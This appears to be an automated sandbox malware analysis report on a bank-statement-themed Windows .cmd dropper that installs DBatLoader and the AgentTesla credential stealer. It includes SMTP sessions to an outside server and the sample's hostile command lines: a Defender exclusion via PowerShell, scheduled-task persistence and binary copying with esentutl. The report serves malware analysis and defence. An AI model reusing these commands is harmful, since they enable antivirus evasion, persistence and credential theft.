Nov 12, 2024 15:30:47.739839077 CET	587	50788	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:30:47 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:30:47.740137100 CET	50788	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:30:47.979327917 CET	587	50788	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:30:47.981784105 CET	50788	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:30:48.222302914 CET	587	50788	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:31:21.307816982 CET	587	50789	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:31:21 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:31:21.307976961 CET	50789	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:31:21.929394960 CET	587	50789	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:31:21.929689884 CET	50789	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:31:21.931193113 CET	587	50789	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:31:22.169411898 CET	587	50789	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:31:44.777314901 CET	587	50790	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:31:44 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:31:44.777448893 CET	50790	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:31:45.020701885 CET	587	50790	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:31:45.020874023 CET	50790	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:31:45.262257099 CET	587	50790	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:31:54.787647963 CET	587	50791	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:31:54 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:31:54.787826061 CET	50791	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:31:55.028908014 CET	587	50791	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:31:55.029056072 CET	50791	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:31:55.271213055 CET	587	50791	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:31:57.739741087 CET	587	50792	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:31:57 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:31:57.742537022 CET	50792	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:31:57.986536026 CET	587	50792	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:31:57.987906933 CET	50792	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:31:58.232315063 CET	587	50792	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:32:03.964684010 CET	587	50793	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:32:03 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:32:03.966089010 CET	50793	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:32:04.204843998 CET	587	50793	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:32:04.205902100 CET	50793	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:32:04.443124056 CET	587	50793	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:32:10.910260916 CET	587	50794	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:32:10 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:32:10.955463886 CET	50794	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:32:11.198405981 CET	587	50794	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:32:11.455918074 CET	50794	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:32:11.699691057 CET	587	50794	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 12, 2024 15:32:20.813045025 CET	587	50795	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:32:20 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 12, 2024 15:32:20.813236952 CET	50795	587	192.168.2.5	51.195.88.199	EHLO 536720
Nov 12, 2024 15:32:21.055373907 CET	587	50795	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 536720 [173.254.250.68] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 12, 2024 15:32:21.055490971 CET	50795	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 12, 2024 15:32:21.317868948 CET	587	50795	51.195.88.199	192.168.2.5	220 TLS go ahead

Target ID:	0
Start time:	09:28:07
Start date:	12/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "
Imagebase:	0x7ff72de00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:28:07
Start date:	12/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:28:07
Start date:	12/11/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x7ff640820000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:28:08
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x400000
File size:	1'081'856 bytes
MD5 hash:	31BC6907D6097A76BB1DD891CFC09B7A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:28:12
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:28:13
Start date:	12/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:28:13
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:	0xfe0000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:28:14
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Imagebase:	0xfe0000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:28:14
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Imagebase:	0x7ff6d64d0000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:28:14
Start date:	12/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:28:15
Start date:	12/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:28:15
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x6d0000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:28:15
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0xd70000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:28:18
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0xc10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:28:18
Start date:	12/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:28:18
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0xde0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:28:18
Start date:	12/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:28:19
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0x750000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	09:28:19
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd""
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:28:19
Start date:	12/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:28:20
Start date:	12/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 6
Imagebase:	0x900000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:28:21
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase:	0xb70000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:28:22
Start date:	12/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:28:25
Start date:	12/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'081'856 bytes
MD5 hash:	31BC6907D6097A76BB1DD891CFC09B7A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:28:27
Start date:	12/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	09:28:27
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x530000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:28:28
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0x6f0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	09:28:33
Start date:	12/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'081'856 bytes
MD5 hash:	31BC6907D6097A76BB1DD891CFC09B7A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	09:28:35
Start date:	12/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	09:28:37
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0x990000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	09:28:37
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0xa20000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	09:28:43
Start date:	12/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0x4e0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30.9%
Total number of Nodes:	1639
Total number of Limit Nodes:	19

Executed Functions

Function 02DAF7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02DBB784,?,?,?,00000000,00000000), ref: 02DAF801

Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA

Part of subcall function 02DAF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02DAFAEB,UacInitialize,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,Initialize), ref: 02DAF6EE
Part of subcall function 02DAF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DAF700

Part of subcall function 02DAF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02DAF754
Part of subcall function 02DAF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DAF766
Part of subcall function 02DAF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DAF77D

Part of subcall function 02D97E5C: GetFileAttributesA.KERNEL32(00000000,?,02DB041F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,UacInitialize), ref: 02D97E67

Part of subcall function 02D9C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F0B8B8,?,02DB0751,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession), ref: 02D9C37B

Part of subcall function 02DADD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DADE40), ref: 02DADDAB
Part of subcall function 02DADD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DADE40), ref: 02DADDDB
Part of subcall function 02DADD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DADDF0
Part of subcall function 02DADD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DADE1C
Part of subcall function 02DADD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DADE25

Part of subcall function 02D97E80: GetFileAttributesA.KERNEL32(00000000,?,02DB356F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,Initialize), ref: 02D97E8B

Part of subcall function 02D98048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02DB370D,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,Initialize,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8), ref: 02D98055

Strings

UacScan, xrefs: 02DAF836, 02DB00D9, 02DB01D1, 02DB07A0, 02DB1386, 02DB1964, 02DB22C6, 02DB29D9, 02DB3C2E, 02DB5B8F, 02DB60FF, 02DB62C4, 02DB65EA, 02DB66F7, 02DB6955, 02DB6A4D, 02DB75F0, 02DB7992, 02DB7BA9, 02DB7D3C, 02DB7F90, 02DB841C, 02DB85A5, 02DB86FE, 02DB88A4, 02DB8A31, 02DB8BC5, 02DB8D44, 02DB8FBB, 02DB9429, 02DB9643, 02DB9824, 02DB99BD, 02DB9BF3, 02DBAA63
EnumServicesStatusW, xrefs: 02DBA9C1
RtlCreateQueryDebugBuffer, xrefs: 02DBA6DD
psapi, xrefs: 02DBA9F3
DlpNotifyPreDragDrop, xrefs: 02DBA44D
NtCreateSection, xrefs: 02DBAF4A
can, xrefs: 02DB3D15
LdrGetProcedureAddress, xrefs: 02DBB07C
EnumServicesStatusExW, xrefs: 02DBA9DF
CryptSIPVerifyIndirectData, xrefs: 02DAFDC7, 02DBA17B
MiniDumpReadDumpStream, xrefs: 02DB9262
UacInitialize, xrefs: 02DAFA8E, 02DB0155, 02DB0898, 02DB553C, 02DB58F2, 02DB5DDF, 02DB78ED, 02DB912F, 02DB954B
